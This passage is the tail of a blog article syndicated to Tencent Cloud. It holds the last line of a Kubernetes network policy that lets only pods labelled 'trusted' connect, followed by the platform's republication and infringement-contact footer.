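              app: trusted      # only pods with this label may connect
```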
This article is shared from the author's personal blog via the Tencent Cloud self-media sync program. Originally published: 2022-06-1. In case of infringement, contact cloudcommunity@tencent for removal.
